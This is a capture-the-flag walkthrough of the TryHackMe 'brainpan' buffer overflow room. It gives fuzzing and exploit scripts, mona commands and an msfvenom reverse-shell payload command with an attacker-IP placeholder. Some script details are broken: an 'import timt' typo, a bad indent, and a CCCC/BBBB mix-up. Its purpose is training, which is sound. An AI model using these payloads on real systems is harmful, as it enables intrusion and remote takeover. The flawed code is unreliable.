Tryhackme: brainpan [hard] {Buffer overflow, OSCP}

In this post we will talk about buffer overflows.

This room helps you learn buffer overflow and preparing to OSCP.

#1. Starting our exe file with wine (in Linux).

As you can see, it is server, that wait connection from client. Use nc (netcat) and port 9999 to connection.

We should find the password. But it is not reversing challenge, so let's paste a lot of "A". If program will crashed, we know, that vulnerability is buffer overflow.

Yes there is buffer overflow vulnerabilty.

Let's use debugger (I am using Immunity debugger) and find the size of buffer.

By default debugger stopped and in "Paused". You must press F9 or click the start button.

Let's create a fuzzer scropt to find size of buffer.

#2. Fuzzer script:

import socket
import time
import sys


buf = b'A' * 100  #chars 

while True:  #loop
    try: 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  #socket
        s.connect(('192.168.1.15', 9999))   #connect function
        s.recv(1024)   #receive 1024 bytes
        print(f'[*] FUZZING with {str(len(buf))} bytes')  #to know how many bytes we are fuzzing
        s.send(buf)  #sending bytes
        buf += b'A' * 100   #increasing our buf
        s.close()   #closing connection
        time.sleep(1)   #sleep 1 sec
    except:
        print('[!] ERROR')   #if error in connection and i.c. we will see error message
        sys.exit(0)   #for exit 

Change IP address!

#3. Fuzzing

Let's run this python script and see how many bytes buffer can accept.

Fuzzer stoped at 600 bytes. So we know, that buffer can accept <= 600 bytes.

Debugger crashed too.

I used cyclic pattern to find exac size of buffer.

To use cyclic, you should install pwntools library in python Command: pip3 install pwn

#4. Exploit script:

import socket
import time
import sys


cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaaf'



try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.1.15', 9999))
    s.recv(1024)
    print('[*] Sending cyclic')
    s.send(cyclic)
    s.close()
    time.sleep(1)
    
except:
    print('[!] ERROR')
    sys.exit(0)
   

Change IP address!

DO NOT FORGET RESTART DEBUGGER AND RUN IT!!!!

RESTART: CTRL + F2 RUN: F9

#6. Running exploit script

After starting exploit script, we can see, that debugger has crashed.

EIP -> Instruction Pointer. This registor contains the address of the next instruction to be executed.

ESP -> Stack Pointer. This register contains the pointer to the stack

EBP -> Base Pointer. This register contains the base address of the function’s frame

Let's copy the EIP value and find the size of buffer.

In stack values locates in reverse order. So "faag" is "gaaf".

Modify our exploit.

import socket
import timt
import sys


# cyclic = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaaf'

buf = b'A' * 520
EBP = b'B' * 4
EIP = b'CCCC'


payload = buf + EBP + EIP

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.1.15', 9999))
    s.recv(1024)
    print('[*] Sending payload')
    s.send(payload)
    s.close()
    time.sleep(1)
    
except:
print('[!] ERROR')
sys.exit(0)

EIP = 43434343 -> BBBB So our exploit is right.

#7. Finding bad chars

Let's create byte-array in a python script and use it to find bad chars in stack, that could be problem for shellcode/

Add byte-array to our exploit and after EIP add to payload.

Run exploit. After running debugger shows, that exe was crashed.

EIP equals 43434343. Press F9 to continue

Use this command to find bad chars:

!mona compare -f <folder, that located bytearra.bin file> -a <address of ESP>

For result we see, that bad chars are "00, 01". But 01 is not bad char. Because 01 located after 00. So bad char is 00 and 01 the next byte.

#8. Finding EIP

Command: !mona jmp -r esp -b "bad chars".

For example: !mona jmp -r esp -b "\x00"

Results:

EIP = 311712F3 -> in little endian: \xF3\x12\x17\x31

#9. Reverse shell

What is Reverse shell?

So Reverse shell is remote shell, that victim machine will send the request to connect.

Reverse shell gives a shell session for me.

Command:

msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER IP> LPORT=<PORT> -f py -v shellcode -b "\x00"

So use this shellcode to getting a remote shell.

I splited terminal horizontaly. In first terminal I will start the exploit. In second one I used nc to listen a port 4444.

After running exploit, we get a shell.